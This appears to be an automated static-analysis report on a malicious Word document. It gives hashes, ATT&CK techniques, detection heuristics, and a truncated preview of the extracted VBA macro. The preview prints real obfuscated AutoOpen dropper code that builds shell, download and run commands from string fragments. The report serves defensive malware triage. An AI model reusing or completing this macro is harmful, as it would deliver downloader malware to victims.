Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cb105c8eb4f99c35…

MALICIOUS

Office (OLE)

69.5 KB Created: 2016-08-25 04:16:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: 706403073c0c350fbedcb644599a33f5 SHA-1: 58d0a70189f8ba097cba3c54c6be304ad96e2ca1 SHA-256: cb105c8eb4f99c353d79ff210058d3184ef67a1a1a528c37c1295463b016feaa
164 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1082 System Information Discovery

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and configured to execute, indicating an attempt to run malicious code upon opening. The CreateObject call suggests the script is likely attempting to download and execute a second-stage payload or perform other malicious actions. The presence of legacy WordBasic auto-exec markers further supports the malicious intent.

Heuristics 7

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8869 bytes
SHA-256: 71cb1aa004d2b658e110eb2afcbf659b014b90f88c26b609220f54846f9ce5e8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim nniqgintexi
Dim alcumyq, rbahyzdi2, utgoseht0, fidimi8, kopan, vborewitp, vsuxnixjy, tocan, mtolid5, xukafb, tbywykfucr7, etevonvu0, uwcanod
Dim adyno
Dim utygasnudt
Dim yrkufmypduc
Dim ejxuqsowc, itomtuqgu, xucnyrc2, jahylqo, omcolqepxa2, asusxewwa2, agsukxewl, prikofcerj, zurerevc
Dim aluhu5
Dim cocobjasr3, ywqyqqiwbish, owaqe, cugjeseqi5, abuhby0, egalwo, ylpesmyrdu, emesvizi, ckaxjyhl, wfuxebids5, ofeqcahiq, ujydzyd5, hiqiba, piwah7, ttynbawly6, ibpuphe4, oladyxp
'chinked menopause rehousing okay chamois
Dim vivgospad0
Dim fbahifsozzo
Dim gyfpaxnu3
Dim jefigxy0, kejgevusw3, swuxtyvoc6, qicidkiph, edlujkow, qusuby, alxamamo6, ohcopjat9, whudipbyry, rcynip, tezsajnu4
Dim atidec, ymdejagy4, ojhebqi, ehxawi, eleqqy, bwaqyxt, zuhuzemb, ezyky, icwugaln1, abvondef, omfamloh, zxicunax, tadjahqa, byxusi, ajeqbuwna3
Dim ivenho5, fyqtadr3, elkuwsax7, qogunwuto, amovkedjyb0, gnulxybb, evusas6, enyzifsi, vkelopun, agkoba, okjokox0, somsopo8, dsepycb, jufurtesy, gihyrd3, remak9, kjamwana8
Dim wfymari1, puzalhexe, ydofxywgu6, lokpon6, itaco2, psyxfocj, ulzitylbep, yxvypgyvk1, dfysgetomu
Dim dxycjorbax
Dim hugnyp
'harass abodes triples retardant gladioli exhilarate decry
Dim josozyjz, uxfavojo, evcighovti4, sjipnoce3, ujudvame, igenyruk, asdizvysge, ymguko4, zgubkugxo, kabipsi7, uwkakynge1, exujaljuk, owkixibnunv8
Dim jvadvohty8
Dim idybti2
Dim blogisk5, epnasah, ihsejcut, mozduzroxo8, zisbafacb, levyzaxu8, arfiswe, inuftucfymp2, uwcoravmopc2, gtykofazpe1, rugutora3, tjilvogxe, ydpexuvq2, azmombydj2
Dim hqynyjydj, olduxufw, cwihku, rpomambu, ykcewig0, ygugmebhi2, ewlakt8, dgusgikfe1, dxuwmebep0, ndohovbi, nmifut9, wjikypic4, osreq1, tincovix, kilqi
'subeditor indoctrinate impel martyr jug
Dim ckisvoj
Dim qevvavk1
Dim ytosbusf0
Dim dydzomtyr
idybti2 = "ar t"
alcumyq = "c "" "
'pints hirer photocopied ferociousness buffalo scavenger fliting
gtykofazpe1 = "stre"
ujudvame = "l = "
hiqiba = "run "
uwcanod = "ject"
xukafb = "= ""c"
owaqe = "drun"
zgubkugxo = "ctiv"
vkelopun = "ctiv"
ibpuphe4 = "bjec"
'redistributable calligraphy duck clothiers duellist sported preparer studying jauntier
kejgevusw3 = "ttp:"
tocan = ".91."
rcynip = "TTP"""
tbywykfucr7 = "= 0;"
ydpexuvq2 = "mp_p"
uwcoravmopc2 = "ream"
puzalhexe = "eToF"
'capacitor classicists actuated gestures sandal rehearing irresponsibly
gnulxybb = "Resp"
jahylqo = " ass"
blogisk5 = "fso."
itaco2 = "md.e"
swuxtyvoc6 = " = n"
sjipnoce3 = "shel"
asusxewwa2 = "o.Ge"
elkuwsax7 = "tive"
olduxufw = "WScr"
'transmuting infrastructure somersaults insignia interferometric unchained
omcolqepxa2 = "ew A"
evusas6 = "er( "
ymguko4 = "Acti"
zxicunax = ";var"
abvondef = "th; "
'authoritarians litmus firstaid epitaxial diplomatically joy patriarchy
jvadvohty8 = "pt.e"
ymdejagy4 = "ipt."
icwugaln1 = ");as"
okjokox0 = "s.op"
nniqgintexi = " (""A"
ulzitylbep = """);v"
amovkedjyb0 = "ect "
wfuxebids5 = "osit"
hqynyjydj = "var "
'infested massless unresponsive selfrespecting polyphonic highlands glimpsed
vivgospad0 = "n();"
abuhby0 = "r st"
rugutora3 = "emOb"
levyzaxu8 = " cmd"
vsuxnixjy = "(""Mi"
ttynbawly6 = "File"
dsepycb = "l.ru"
uwkakynge1 = "ject"
'eversion aromas rebutted obliterate unrelenting customisation
agsukxewl = "eXOb"
qogunwuto = "new "
epnasah = " = n"
gihyrd3 = "empN"
uxfavojo = "XObj"
mtolid5 = "ing."
edlujkow = "ass."
'phrase depositional upholstery tagged hurries
hugnyp = "= 1;"
qicidkiph = "Shel"
josozyjz = ");st"
dxycjorbax = "onse"
adyno = "ject"
utygasnudt = "p_pa"
mozduzroxo8 = "ath "
xucnyrc2 = "fso "
emesvizi = "49/b"
'irrigating hillocky catched compilations decompressing feverish
exujaljuk = "ript"
dfysgetomu = "ame("
kopan = "ass."
arfiswe = "ew A"
bwaqyxt = "Fold"
'hob fis
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.